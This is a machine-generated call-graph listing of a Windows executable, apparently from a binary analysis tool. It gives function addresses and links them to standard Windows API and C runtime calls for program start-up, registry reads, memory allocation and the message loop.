Shell_NotifyIconW 86198->86201 86202 4272db Shell_NotifyIconW 86198->86202 86199->86197 86206 401b80 86201->86206 86204 40e1ba 86204->86181 86205->86182 86207 401b9c 86206->86207 86227 401c7e 86206->86227 86229 4013c0 86207->86229 86210 42722b LoadStringW 86213 427246 86210->86213 86211 401bb9 86234 402160 86211->86234 86248 40e0a0 86213->86248 86214 401bcd 86216 427258 86214->86216 86217 401bda 86214->86217 86252 40d200 52 API calls 2 library calls 86216->86252 86217->86213 86219 401be4 86217->86219 86218 401bf3 setSBUpLow _wcscpy _wcsncpy 86226 401c62 Shell_NotifyIconW 86218->86226 86247 40d200 52 API calls 2 library calls 86219->86247 86222 427267 86222->86218 86223 42727b 86222->86223 86253 40d200 52 API calls 2 library calls 86223->86253 86225 427289 86226->86227 86227->86204 86228->86198 86254 4115d7 86229->86254 86235 426daa 86234->86235 86236 40216b _wcslen 86234->86236 86292 40c600 86235->86292 86239 402180 86236->86239 86240 40219e 86236->86240 86238 426db5 86238->86214 86291 403bd0 52 API calls ctype 86239->86291 86241 4013a0 52 API calls 86240->86241 86243 4021a5 86241->86243 86245 426db7 86243->86245 86246 4115d7 52 API calls 86243->86246 86244 402187 _memmove 86244->86214 86246->86244 86247->86218 86249 40e0b2 86248->86249 86250 40e0a8 86248->86250 86249->86218 86304 403c30 52 API calls _memmove 86250->86304 86252->86222 86253->86225 86256 4115e1 _malloc 86254->86256 86257 4013e4 86256->86257 86260 4115fd std::exception::exception 86256->86260 86268 4135bb 86256->86268 86265 4013a0 86257->86265 86258 41163b 86283 4180af 46 API calls std::exception::operator= 86258->86283 86260->86258 86282 41130a 51 API calls __cinit 86260->86282 86261 411645 86284 418105 RaiseException 86261->86284 86264 411656 86266 4115d7 52 API calls 86265->86266 86267 4013a7 86266->86267 86267->86210 86267->86211 86269 413638 _malloc 86268->86269 86272 4135c9 _malloc 86268->86272 86290 417f77 46 API calls __getptd_noexit 86269->86290 86270 4135d4 86270->86272 86285 418901 46 API calls __NMSG_WRITE 86270->86285 86286 418752 46 API calls 7 library calls 86270->86286 86287 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86270->86287 86272->86270 86274 4135f7 RtlAllocateHeap 86272->86274 86277 413624 86272->86277 86280 413622 86272->86280 86274->86272 86275 413630 86274->86275 86275->86256 86288 417f77 46 API calls __getptd_noexit 86277->86288 86289 417f77 46 API calls __getptd_noexit 86280->86289 86282->86258 86283->86261 86284->86264 86285->86270 86286->86270 86288->86280 86289->86275 86290->86275 86291->86244 86293 40c619 86292->86293 86294 40c60a 86292->86294 86293->86238 86294->86293 86297 4026f0 86294->86297 86296 426d7a _memmove 86296->86238 86298 426873 86297->86298 86299 4026ff 86297->86299 86300 4013a0 52 API calls 86298->86300 86299->86296 86301 42687b 86300->86301 86302 4115d7 52 API calls 86301->86302 86303 42689e _memmove 86302->86303 86303->86296 86304->86249 86305 40bd20 86306 428194 86305->86306 86307 40bd2d 86305->86307 86308 40bd43 86306->86308 86310 4281bc 86306->86310 86312 4281b2 86306->86312 86309 40bd37 86307->86309 86328 4531b1 85 API calls 5 library calls 86307->86328 86317 40bd50 86309->86317 86327 45e987 86 API calls ctype 86310->86327 86326 40b510 VariantClear 86312->86326 86316 4281ba 86318 426cf1 86317->86318 86319 40bd63 86317->86319 86338 44cde9 52 API calls _memmove 86318->86338 86329 40bd80 86319->86329 86322 40bd73 86322->86308 86323 426cfc 86324 40e0a0 52 API calls 86323->86324 86325 426d02 86324->86325 86326->86316 86327->86307 86328->86309 86330 40bd8e 86329->86330 86337 40bdb7 _memmove 86329->86337 86331 40bded 86330->86331 86332 40bdad 86330->86332 86330->86337 86334 4115d7 52 API calls 86331->86334 86339 402f00 86332->86339 86335 40bdf6 86334->86335 86336 4115d7 52 API calls 86335->86336 86335->86337 86336->86337 86337->86322 86338->86323 86340 402f10 86339->86340 86341 402f0c 86339->86341 86342 4268c3 86340->86342 86343 4115d7 52 API calls 86340->86343 86341->86337 86344 402f51 ctype _memmove 86343->86344 86344->86337 86345 425ba2 86350 40e360 86345->86350 86347 425bb4 86366 41130a 51 API calls __cinit 86347->86366 86349 425bbe 86351 4115d7 52 API calls 86350->86351 86352 40e3ec GetModuleFileNameW 86351->86352 86367 413a0e 86352->86367 86354 40e421 _wcsncat 86370 413a9e 86354->86370 86357 4115d7 52 API calls 86358 40e45e _wcscpy 86357->86358 86373 40bc70 86358->86373 86362 40e4a9 86362->86347 86363 40e4a1 _wcscat _wcslen _wcsncpy 86363->86362 86364 4115d7 52 API calls 86363->86364 86365 401c90 52 API calls 86363->86365 86364->86363 86365->86363 86366->86349 86392 413801 86367->86392 86422 419efd 86370->86422 86374 4115d7 52 API calls 86373->86374 86375 40bc98 86374->86375 86376 4115d7 52 API calls 86375->86376 86377 40bca6 86376->86377 86378 40e4c0 86377->86378 86434 403350 86378->86434 86380 40e4cb RegOpenKeyExW 86381 427190 RegQueryValueExW 86380->86381 86382 40e4eb 86380->86382 86383 4271b0 86381->86383 86384 42721a RegCloseKey 86381->86384 86382->86363 86385 4115d7 52 API calls 86383->86385 86384->86363 86386 4271cb 86385->86386 86441 43652f 52 API calls 86386->86441 86388 4271d8 RegQueryValueExW 86389 42720e 86388->86389 86390 4271f7 86388->86390 86389->86384 86391 402160 52 API calls 86390->86391 86391->86389 86393 41389e 86392->86393 86400 41381a 86392->86400 86394 4139e8 86393->86394 86395 413a00 86393->86395 86419 417f77 46 API calls __getptd_noexit 86394->86419 86421 417f77 46 API calls __getptd_noexit 86395->86421 86398 4139ed 86420 417f25 10 API calls _W_expandtime 86398->86420 86399 413967 86399->86354 86400->86393 86403 41388a 86400->86403 86414 419e30 46 API calls 2 library calls 86400->86414 86403->86393 86407 413909 86403->86407 86415 419e30 46 API calls 2 library calls 86403->86415 86404 41396c 86404->86393 86404->86399 86405 41397a 86404->86405 86418 419e30 46 API calls 2 library calls 86405->86418 86406 413945 86406->86393 86406->86399 86410 41395b 86406->86410 86407->86404 86409 413929 86407->86409 86409->86393 86409->86406 86416 419e30 46 API calls 2 library calls 86409->86416 86417 419e30 46 API calls 2 library calls 86410->86417 86414->86403 86415->86407 86416->86406 86417->86399 86418->86399 86419->86398 86420->86399 86421->86399 86423 419f13 86422->86423 86424 419f0e 86422->86424 86431 417f77 46 API calls __getptd_noexit 86423->86431 86424->86423 86427 419f2b 86424->86427 86429 40e454 86427->86429 86433 417f77 46 API calls __getptd_noexit 86427->86433 86429->86357 86430 419f18 86432 417f25 10 API calls _W_expandtime 86430->86432 86431->86430 86432->86429 86433->86430 86435 403367 86434->86435 86436 403358 86434->86436 86437 4115d7 52 API calls 86435->86437 86436->86380 86438 403370 86437->86438 86439 4115d7 52 API calls 86438->86439 86440 40339e 86439->86440 86440->86380 86441->86388 86442 416454 86479 416c70 86442->86479 86444 416460 GetStartupInfoW 86445 416474 86444->86445 86480 419d5a HeapCreate 86445->86480 86447 4164cd 86448 4164d8 86447->86448 86563 41642b 46 API calls 3 library calls 86447->86563 86481 417c20 GetModuleHandleW 86448->86481 86451 4164de 86452 4164e9 __RTC_Initialize 86451->86452 86564 41642b 46 API calls 3 library calls 86451->86564 86500 41aaa1 GetStartupInfoW 86452->86500 86456 416503 GetCommandLineW 86513 41f584 GetEnvironmentStringsW 86456->86513 86459 416513 86519 41f4d6 GetModuleFileNameW 86459->86519 86462 41651d 86463 416528 86462->86463 86566 411924 46 API calls 3 library calls 86462->86566 86523 41f2a4 86463->86523 86466 41652e 86467 416539 86466->86467 86567 411924 46 API calls 3 library calls 86466->86567 86537 411703 86467->86537 86470 416541 86472 41654c __wwincmdln 86470->86472 86568 411924 46 API calls 3 library calls 86470->86568 86541 40d6b0 86472->86541 86475 41657c 86570 411906 46 API calls _doexit 86475->86570 86478 416581 __mtinitlocknum 86479->86444 86480->86447 86482 417c34 86481->86482 86483 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86481->86483 86571 4178ff 49 API calls _free 86482->86571 86484 417c87 TlsAlloc 86483->86484 86488 417cd5 TlsSetValue 86484->86488 86489 417d96 86484->86489 86487 417c39 86487->86451 86488->86489 86490 417ce6 __init_pointers 86488->86490 86489->86451 86572 418151 InitializeCriticalSectionAndSpinCount 86490->86572 86492 417d91 86580 4178ff 49 API calls _free 86492->86580 86494 417d2a 86494->86492 86573 416b49 86494->86573 86497 417d76 86579 41793c 46 API calls 4 library calls 86497->86579 86499 417d7e GetCurrentThreadId 86499->86489 86501 416b49 __calloc_crt 46 API calls 86500->86501 86502 41aabf 86501->86502 86502->86502 86503 41ac34 86502->86503 86505 416b49 __calloc_crt 46 API calls 86502->86505 86508 4164f7 86502->86508 86509 41abb4 86502->86509 86504 41ac6a GetStdHandle 86503->86504 86506 41acce SetHandleCount 86503->86506 86507 41ac7c GetFileType 86503->86507 86512 41aca2 InitializeCriticalSectionAndSpinCount 86503->86512 86504->86503 86505->86502 86506->86508 86507->86503 86508->86456 86565 411924 46 API calls 3 library calls 86508->86565 86509->86503 86510 41abe0 GetFileType 86509->86510 86511 41abeb InitializeCriticalSectionAndSpinCount 86509->86511 86510->86509 86510->86511 86511->86508 86511->86509 86512->86503 86512->86508 86514 41f595 86513->86514 86515 41f599 86513->86515 86514->86459 86590 416b04 86515->86590 86517 41f5bb _memmove 86518 41f5c2 FreeEnvironmentStringsW 86517->86518 86518->86459 86520 41f50b _wparse_cmdline 86519->86520 86521 416b04 __malloc_crt 46 API calls 86520->86521 86522 41f54e _wparse_cmdline 86520->86522 86521->86522 86522->86462 86524 41f2bc _wcslen 86523->86524 86528 41f2b4 86523->86528 86525 416b49 __calloc_crt 46 API calls 86524->86525 86530 41f2e0 _wcslen 86525->86530 86526 41f336 86597 413748 86526->86597 86528->86466 86529 416b49 __calloc_crt 46 API calls 86529->86530 86530->86526 86530->86528 86530->86529 86531 41f35c 86530->86531 86534 41f373 86530->86534 86596 41ef12 46 API calls 2 library calls 86530->86596 86532 413748 _free 46 API calls 86531->86532 86532->86528 86603 417ed3 86534->86603 86536 41f37f 86536->86466 86538 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86537->86538 86540 411750 __IsNonwritableInCurrentImage 86538->86540 86622 41130a 51 API calls __cinit 86538->86622 86540->86470 86542 42e2f3 86541->86542 86543 40d6cc 86541->86543 86623 408f40 86543->86623 86545 40d707 86627 40ebb0 86545->86627 86548 40d737 86630 411951 86548->86630 86553 40d751 86642 40f4e0 SystemParametersInfoW SystemParametersInfoW 86553->86642 86555 40d75f 86643 40d590 GetCurrentDirectoryW 86555->86643 86557 40d767 SystemParametersInfoW 86558 40d78d 86557->86558 86559 408f40 VariantClear 86558->86559 86560 40d79d 86559->86560 86561 408f40 VariantClear 86560->86561 86562 40d7a6 86561->86562 86562->86475 86569 4118da 46 API calls _doexit 86562->86569 86563->86448 86564->86452 86569->86475 86570->86478 86571->86487 86572->86494 86575 416b52 86573->86575 86576 416b8f 86575->86576 86577 416b70 Sleep 86575->86577 86581 41f677 86575->86581 86576->86492 86576->86497 86578 416b85 86577->86578 86578->86575 86578->86576 86579->86499 86580->86489 86582 41f683 86581->86582 86588 41f69e _malloc 86581->86588 86583 41f68f 86582->86583 86582->86588 86589 417f77 46 API calls __getptd_noexit 86583->86589 86585 41f6b1 HeapAlloc 86587 41f6d8 86585->86587 86585->86588 86586 41f694 86586->86575 86587->86575 86588->86585 86588->86587 86589->86586 86593 416b0d 86590->86593 86591 4135bb _malloc 45 API calls 86591->86593 86592 416b43 86592->86517 86593->86591 86593->86592 86594 416b24 Sleep 86593->86594 86595 416b39 86594->86595 86595->86592 86595->86593 86596->86530 86598 41377c __dosmaperr 86597->86598 86599 413753 RtlFreeHeap 86597->86599 86598->86528 86599->86598 86600 413768 86599->86600 86606 417f77 46 API calls __getptd_noexit 86600->86606 86602 41376e GetLastError 86602->86598 86607 417daa 86603->86607 86606->86602 86608 417dc9 setSBUpLow __call_reportfault 86607->86608 86609 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86608->86609 86611 417eb5 __call_reportfault 86609->86611 86613 41a208 86611->86613 86612 417ed1 GetCurrentProcess TerminateProcess 86612->86536 86614 41a210 86613->86614 86615 41a212 IsDebuggerPresent 86613->86615 86614->86612 86621 41fe19 86615->86621 86618 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86619 421ff8 GetCurrentProcess TerminateProcess 86618->86619 86620 421ff0 __call_reportfault 86618->86620 86619->86612 86620->86619 86621->86618 86622->86540 86624 408f48 ctype 86623->86624 86625 4265c7 VariantClear 86624->86625 86626 408f55 ctype 86624->86626 86625->86626 86626->86545 86683 40ebd0 86627->86683 86687 4182cb 86630->86687 86632 41195e 86694 4181f2 LeaveCriticalSection 86632->86694 86634 40d748 86635 4119b0 86634->86635 86636 4119d6 86635->86636 86637 4119bc 86635->86637 86636->86553 86637->86636 86729 417f77 46 API calls __getptd_noexit 86637->86729 86639 4119c6 86730 417f25 10 API calls _W_expandtime 86639->86730 86641 4119d1 86641->86553 86642->86555 86731 401f20 86643->86731 86645 40d5b6 IsDebuggerPresent 86646 40d5c4 86645->86646 86647 42e1bb MessageBoxA 86645->86647 86648 42e1d4 86646->86648 86649 40d5e3 86646->86649 86647->86648 86903 403a50 52 API calls 3 library calls 86648->86903 86801 40f520 86649->86801 86653 40d5fd GetFullPathNameW 86813 401460 86653->86813 86655 40d63b 86656 40d643 86655->86656 86658 42e231 SetCurrentDirectoryW 86655->86658 86657 40d64c 86656->86657 86904 432fee 6 API calls 86656->86904 86828 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86657->86828 86658->86656 86661 42e252 86661->86657 86663 42e25a GetModuleFileNameW 86661->86663 86665 42e274 86663->86665 86666 42e2cb GetForegroundWindow ShellExecuteW 86663->86666 86905 401b10 86665->86905 86670 40d688 86666->86670 86667 40d656 86669 40d669 86667->86669 86672 40e0c0 74 API calls 86667->86672 86836 4091e0 86669->86836 86674 40d692 SetCurrentDirectoryW 86670->86674 86672->86669 86674->86557 86677 42e28d 86912 40d200 52 API calls 2 library calls 86677->86912 86680 42e299 GetForegroundWindow ShellExecuteW 86681 42e2c6 86680->86681 86681->86670 86682 40ec00 LoadLibraryA GetProcAddress 86682->86548 86684 40d72e 86683->86684 86685 40ebd6 LoadLibraryA 86683->86685 86684->86548 86684->86682 86685->86684 86686 40ebe7 GetProcAddress 86685->86686 86686->86684 86688 4182e0 86687->86688 86689 4182f3 EnterCriticalSection 86687->86689 86695 418209 86688->86695 86689->86632 86691 4182e6 86691->86689 86722 411924 46 API calls 3 library calls 86691->86722 86694->86634 86696 418215 __mtinitlocknum 86695->86696 86697 418225 86696->86697 86698 41823d 86696->86698 86723 418901 46 API calls __NMSG_WRITE 86697->86723 86700 416b04 __malloc_crt 45 API calls 86698->86700 86706 41824b __mtinitlocknum 86698->86706 86702 418256 86700->86702 86701 41822a 86724 418752 46 API calls 7 library calls 86701->86724 86704 41825d 86702->86704 86705 41826c 86702->86705 86726 417f77 46 API calls __getptd_noexit 86704->86726 86710 4182cb __lock 45 API calls 86705->86710 86706->86691 86707 418231 86725 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86707->86725 86712 418273 86710->86712 86713 4182a6 86712->86713 86714 41827b InitializeCriticalSectionAndSpinCount 86712->86714 86715 413748 _free 45 API calls 86713->86715 86716 418297 86714->86716 86717 41828b 86714->86717 86715->86716 86728 4182c2 LeaveCriticalSection _doexit 86716->86728 86718 413748 _free 45 API calls 86717->86718 86719 418291 86718->86719 86727 417f77 46 API calls __getptd_noexit 86719->86727 86723->86701 86724->86707 86726->86706 86727->86716 86728->86706 86729->86639 86730->86641 86913 40e6e0 86731->86913 86735 401f41 GetModuleFileNameW 86931 410100 86735->86931 86737 401f5c 86943 410960 86737->86943 86740 401b10 52 API calls 86741 401f81 86740->86741 86946 401980 86741->86946 86743 401f8e 86744 408f40 VariantClear 86743->86744 86745 401f9d 86744->86745 86746 401b10 52 API calls 86745->86746 86747 401fb4 86746->86747 86748 401980 53 API calls 86747->86748 86749 401fc3 86748->86749 86750 401b10 52 API calls 86749->86750 86751 401fd2 86750->86751 86954 40c2c0 86751->86954 86753 401fe1 86754 40bc70 52 API calls 86753->86754 86755 401ff3 86754->86755 86972 401a10 86755->86972 86757 401ffe 86979 4114ab 86757->86979 86760 428b05 86763 401a10 52 API calls 86760->86763 86761 402017 86762 4114ab __wcsicoll 58 API calls 86761->86762 86765 402022 86762->86765 86764 428b18 86763->86764 86767 401a10 52 API calls 86764->86767 86765->86764 86766 40202d 86765->86766 86768 4114ab __wcsicoll 58 API calls 86766->86768 86769 428b33 86767->86769 86770 402038 86768->86770 86772 428b3b GetModuleFileNameW 86769->86772 86771 402043 86770->86771 86770->86772 86773 4114ab __wcsicoll 58 API calls 86771->86773 86774 401a10 52 API calls 86772->86774 86775 40204e 86773->86775 86776 428b6c 86774->86776 86777 402092 86775->86777 86780 428b90 _wcscpy 86775->86780 86783 401a10 52 API calls 86775->86783 86778 40e0a0 52 API calls 86776->86778 86779 4020a3 86777->86779 86777->86780 86781 428b7a 86778->86781 86782 428bc6 86779->86782 86987 40e830 53 API calls 86779->86987 86788 401a10 52 API calls 86780->86788 86784 401a10 52 API calls 86781->86784 86786 402073 _wcscpy 86783->86786 86787 428b88 86784->86787 86792 401a10 52 API calls 86786->86792 86787->86780 86796 4020d0 86788->86796 86789 4020bb 86988 40cf00 53 API calls 86789->86988 86791 4020c6 86793 408f40 VariantClear 86791->86793 86792->86777 86793->86796 86794 402110 86798 408f40 VariantClear 86794->86798 86796->86794 86799 401a10 52 API calls 86796->86799 86989 40cf00 53 API calls 86796->86989 86990 40e6a0 53 API calls 86796->86990 86800 402120 ctype 86798->86800 86799->86796 86800->86645 86802 4295c9 setSBUpLow 86801->86802 86803 40f53c 86801->86803 86806 4295d9 GetOpenFileNameW 86802->86806 87669 410120 86803->87669 86805 40f545 87673 4102b0 SHGetMalloc 86805->87673 86806->86803 86808 40d5f5 86806->86808 86808->86653 86808->86655 86809 40f54c 87678 410190 GetFullPathNameW 86809->87678 86811 40f559 87689 40f570 86811->87689 87751 402400 86813->87751 86815 40146f 86818 428c29 _wcscat 86815->86818 87760 401500 86815->87760 86817 40147c 86817->86818 87768 40d440 86817->87768 86820 401489 86820->86818 86821 401491 GetFullPathNameW 86820->86821 86822 402160 52 API calls 86821->86822 86823 4014bb 86822->86823 86824 402160 52 API calls 86823->86824 86825 4014c8 86824->86825 86825->86818 86826 402160 52 API calls 86825->86826 86827 4014ee 86826->86827 86827->86655 86829 428361 86828->86829 86830 4103fc LoadImageW RegisterClassExW 86828->86830 87788 44395e EnumResourceNamesW LoadImageW 86829->87788 87787 410490 7 API calls 86830->87787 86833 40d651 86835 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86833->86835 86834 428368 86835->86667 86837 409202 86836->86837 86838 42d7ad 86836->86838 86893 409216 ctype 86837->86893 88051 410940 329 API calls 86837->88051 88054 45e737 90 API calls 3 library calls 86838->88054 86841 409386 86842 40939c 86841->86842 88052 40f190 10 API calls 86841->88052 86842->86670 86902 401000 Shell_NotifyIconW setSBUpLow 86842->86902 86844 4095b2 86844->86842 86846 4095bf 86844->86846 86845 409253 PeekMessageW 86845->86893 88053 401a50 329 API calls 86846->88053 86848 40d410 VariantClear 86848->86893 86849 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86849->86842 86851 4095f9 86849->86851 86850 42d8cd Sleep 86850->86893 86855 42e158 TranslateMessage DispatchMessageW GetMessageW 86851->86855 86853 42e13b 88072 40d410 VariantClear 86853->88072 86855->86855 86858 42e188 86855->86858 86857 409567 PeekMessageW 86857->86893 86858->86842 86861 44c29d 52 API calls 86901 4094e0 86861->86901 86862 46f3c1 107 API calls 86862->86893 86863 40e0a0 52 API calls 86863->86893 86864 46fdbf 108 API calls 86864->86901 86865 409551 TranslateMessage DispatchMessageW 86865->86857 86867 42dcd2 WaitForSingleObject 86868 42dcf0 GetExitCodeProcess CloseHandle 86867->86868 86867->86893 88061 40d410 VariantClear 86868->88061 86870 42dd3d Sleep 86870->86901 86873 4094cf Sleep 86873->86901 86875 42d94d timeGetTime 88057 465124 53 API calls 86875->88057 86877 40c620 timeGetTime 86877->86901 86880 465124 53 API calls 86880->86901 86881 42dd89 CloseHandle 86881->86901 86882 47d33e 307 API calls 86882->86893 86884 408f40 VariantClear 86884->86901 86885 42de19 GetExitCodeProcess CloseHandle 86885->86901 86888 42de88 Sleep 86888->86893 86893->86841 86893->86845 86893->86848 86893->86850 86893->86853 86893->86857 86893->86862 86893->86863 86893->86865 86893->86867 86893->86870 86893->86873 86893->86875 86893->86882 86894 42e0cc VariantClear 86893->86894 86895 45e737 90 API calls 86893->86895 86896 408f40 VariantClear 86893->86896 86893->86901 87789 4091b0 86893->87789 87847 40afa0 86893->87847 87873 408fc0 86893->87873 87908 408cc0 86893->87908 87922 4096a0 86893->87922 88049 40d150 TranslateAcceleratorW 86893->88049 88050 40d170 IsDialogMessageW GetClassLongW 86893->88050 88055 465124 53 API calls 86893->88055 88056 40c620 timeGetTime 86893->88056 88071 40e270 VariantClear ctype 86893->88071 86894->86893 86895->86893 86896->86893 86898 401980 53 API calls 86898->86901 86899 401b10 52 API calls 86899->86901 86901->86861 86901->86864 86901->86877 86901->86880 86901->86881 86901->86884 86901->86885 86901->86888 86901->86893 86901->86898 86901->86899 88058 45178a 54 API calls 86901->88058 88059 47d33e 329 API calls 86901->88059 88060 453bc6 54 API calls 86901->88060 88062 40d410 VariantClear 86901->88062 88063 443d19 67 API calls _wcslen 86901->88063 88064 4574b4 VariantClear 86901->88064 88065 403cd0 86901->88065 88069 4731e1 VariantClear 86901->88069 88070 4331a2 6 API calls 86901->88070 86902->86670 86903->86655 86904->86661 86906 401b16 _wcslen 86905->86906 86907 4115d7 52 API calls 86906->86907 86910 401b63 86906->86910 86908 401b4b _memmove 86907->86908 86909 4115d7 52 API calls 86908->86909 86909->86910 86911 40d200 52 API calls 2 library calls 86910->86911 86911->86677 86912->86680 86914 40bc70 52 API calls 86913->86914 86915 401f31 86914->86915 86916 402560 86915->86916 86917 40256d __write_nolock 86916->86917 86918 402160 52 API calls 86917->86918 86920 402593 86918->86920 86924 4025bd 86920->86924 86991 401c90 86920->86991 86921 4026f0 52 API calls 86921->86924 86922 4026db 86922->86735 86923 4026a7 86923->86922 86925 401b10 52 API calls 86923->86925 86924->86921 86924->86923 86926 401b10 52 API calls 86924->86926 86929 401c90 52 API calls 86924->86929 86994 40d7c0 52 API calls 2 library calls 86924->86994 86927 4026d1 86925->86927 86926->86924 86995 40d7c0 52 API calls 2 library calls 86927->86995 86929->86924 86996 40f760 86931->86996 86934 410118 86934->86737 86936 42805d 86937 42806a 86936->86937 87052 431e58 86936->87052 86939 413748 _free 46 API calls 86937->86939 86940 428078 86939->86940 86941 431e58 82 API calls 86940->86941 86942 428084 86941->86942 86942->86737 86944 4115d7 52 API calls 86943->86944 86945 401f74 86944->86945 86945->86740 86947 4019a3 86946->86947 86948 401985 86946->86948 86947->86948 86949 4019b8 86947->86949 86951 40199f 86948->86951 87657 403e10 53 API calls 86948->87657 87658 403e10 53 API calls 86949->87658 86951->86743 86953 4019c4 86953->86743 86955 40c2c7 86954->86955 86956 40c30e 86954->86956 86959 40c2d3 86955->86959 86960 426c79 86955->86960 86957 40c315 86956->86957 86958 426c2b 86956->86958 86961 40c321 86957->86961 86962 426c5a 86957->86962 86964 426c4b 86958->86964 86965 426c2e 86958->86965 87659 403ea0 52 API calls __cinit 86959->87659 87664 4534e3 52 API calls 86960->87664 87660 403ea0 52 API calls __cinit 86961->87660 87663 4534e3 52 API calls 86962->87663 87662 4534e3 52 API calls 86964->87662 86968 40c2de 86965->86968 87661 4534e3 52 API calls 86965->87661 86968->86753 86973 401a30 86972->86973 86974 401a17 86972->86974 86975 402160 52 API calls 86973->86975 86976 401a2d 86974->86976 87665 403c30 52 API calls _memmove 86974->87665 86977 401a3d 86975->86977 86976->86757 86977->86757 86980 411523 86979->86980 86981 4114ba 86979->86981 87668 4113a8 58 API calls 4 library calls 86980->87668 86984 40200c 86981->86984 87666 417f77 46 API calls __getptd_noexit 86981->87666 86984->86760 86984->86761 86985 4114c6 87667 417f25 10 API calls _W_expandtime 86985->87667 86987->86789 86988->86791 86989->86796 86990->86796 86992 4026f0 52 API calls 86991->86992 86993 401c97 86992->86993 86993->86920 86994->86924 86995->86922 87056 40f6f0 86996->87056 86998 40f77b _strcat ctype 87064 40f850 86998->87064 87003 427c2a 87093 414d04 87003->87093 87005 40f7fc 87005->87003 87006 40f804 87005->87006 87080 414a46 87006->87080 87010 40f80e 87010->86934 87015 4528bd 87010->87015 87012 427c59 87099 414fe2 87012->87099 87014 427c79 87016 4150d1 _fseek 81 API calls 87015->87016 87017 452930 87016->87017 87599 452719 87017->87599 87020 452948 87020->86936 87021 414d04 __fread_nolock 61 API calls 87022 452966 87021->87022 87023 414d04 __fread_nolock 61 API calls 87022->87023 87024 452976 87023->87024 87025 414d04 __fread_nolock 61 API calls 87024->87025 87026 45298f 87025->87026 87027 414d04 __fread_nolock 61 API calls 87026->87027 87028 4529aa 87027->87028 87029 4150d1 _fseek 81 API calls 87028->87029 87030 4529c4 87029->87030 87031 4135bb _malloc 46 API calls 87030->87031 87032 4529cf 87031->87032 87033 4135bb _malloc 46 API calls 87032->87033 87034 4529db 87033->87034 87035 414d04 __fread_nolock 61 API calls 87034->87035 87036 4529ec 87035->87036 87037 44afef GetSystemTimeAsFileTime 87036->87037 87038 452a00 87037->87038 87039 452a36 87038->87039 87040 452a13 87038->87040 87041 452aa5 87039->87041 87042 452a3c 87039->87042 87043 413748 _free 46 API calls 87040->87043 87045 413748 _free 46 API calls 87041->87045 87605 44b1a9 87042->87605 87046 452a1c 87043->87046 87048 452aa3 87045->87048 87049 413748 _free 46 API calls 87046->87049 87047 452a9d 87050 413748 _free 46 API calls 87047->87050 87048->86936 87051 452a25 87049->87051 87050->87048 87051->86936 87053 431e64 87052->87053 87054 431e6a 87052->87054 87055 414a46 __fcloseall 82 API calls 87053->87055 87054->86937 87055->87054 87057 425de2 87056->87057 87058 40f6fc _wcslen 87056->87058 87057->86998 87059 40f710 WideCharToMultiByte 87058->87059 87060 40f756 87059->87060 87061 40f728 87059->87061 87060->86998 87062 4115d7 52 API calls 87061->87062 87063 40f735 WideCharToMultiByte 87062->87063 87063->86998 87065 40f85d setSBUpLow _strlen 87064->87065 87067 40f7ab 87065->87067 87112 414db8 87065->87112 87068 4149c2 87067->87068 87127 414904 87068->87127 87070 40f7e9 87070->87003 87071 40f5c0 87070->87071 87075 40f5cd _strcat __write_nolock _memmove 87071->87075 87072 414d04 __fread_nolock 61 API calls 87072->87075 87074 425d11 87076 4150d1 _fseek 81 API calls 87074->87076 87075->87072 87075->87074 87079 40f691 __tzset_nolock 87075->87079 87215 4150d1 87075->87215 87077 425d33 87076->87077 87078 414d04 __fread_nolock 61 API calls 87077->87078 87078->87079 87079->87005 87081 414a52 __mtinitlocknum 87080->87081 87082 414a64 87081->87082 87083 414a79 87081->87083 87355 417f77 46 API calls __getptd_noexit 87082->87355 87085 415471 __lock_file 47 API calls 87083->87085 87090 414a74 __mtinitlocknum 87083->87090 87087 414a92 87085->87087 87086 414a69 87356 417f25 10 API calls _W_expandtime 87086->87356 87339 4149d9 87087->87339 87090->87010 87424 414c76 87093->87424 87095 414d1c 87096 44afef 87095->87096 87592 442c5a 87096->87592 87098 44b00d 87098->87012 87100 414fee __mtinitlocknum 87099->87100 87101 414ffa 87100->87101 87102 41500f 87100->87102 87596 417f77 46 API calls __getptd_noexit 87101->87596 87103 415471 __lock_file 47 API calls 87102->87103 87105 415017 87103->87105 87107 414e4e __ftell_nolock 51 API calls 87105->87107 87106 414fff 87597 417f25 10 API calls _W_expandtime 87106->87597 87109 415024 87107->87109 87598 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87109->87598 87110 41500a __mtinitlocknum 87110->87014 87113 414dd6 87112->87113 87114 414deb 87112->87114 87123 417f77 46 API calls __getptd_noexit 87113->87123 87114->87113 87116 414df2 87114->87116 87125 41b91b 79 API calls 12 library calls 87116->87125 87117 414ddb 87124 417f25 10 API calls _W_expandtime 87117->87124 87120 414e18 87121 414de6 87120->87121 87126 418f98 77 API calls 5 library calls 87120->87126 87121->87065 87123->87117 87124->87121 87125->87120 87126->87121 87129 414910 __mtinitlocknum 87127->87129 87128 414923 87183 417f77 46 API calls __getptd_noexit 87128->87183 87129->87128 87132 414951 87129->87132 87131 414928 87184 417f25 10 API calls _W_expandtime 87131->87184 87146 41d4d1 87132->87146 87135 414956 87136 41496a 87135->87136 87137 41495d 87135->87137 87139 414992 87136->87139 87140 414972 87136->87140 87185 417f77 46 API calls __getptd_noexit 87137->87185 87163 41d218 87139->87163 87186 417f77 46 API calls __getptd_noexit 87140->87186 87144 414933 __mtinitlocknum @_EH4_CallFilterFunc@8 87144->87070 87147 41d4dd __mtinitlocknum 87146->87147 87148 4182cb __lock 46 API calls 87147->87148 87160 41d4eb 87148->87160 87149 41d560 87188 41d5fb 87149->87188 87150 41d567 87152 416b04 __malloc_crt 46 API calls 87150->87152 87154 41d56e 87152->87154 87153 41d5f0 __mtinitlocknum 87153->87135 87154->87149 87155 41d57c InitializeCriticalSectionAndSpinCount 87154->87155 87156 41d59c 87155->87156 87157 41d5af EnterCriticalSection 87155->87157 87161 413748 _free 46 API calls 87156->87161 87157->87149 87158 418209 __mtinitlocknum 46 API calls 87158->87160 87160->87149 87160->87150 87160->87158 87191 4154b2 47 API calls __lock 87160->87191 87192 415520 LeaveCriticalSection LeaveCriticalSection 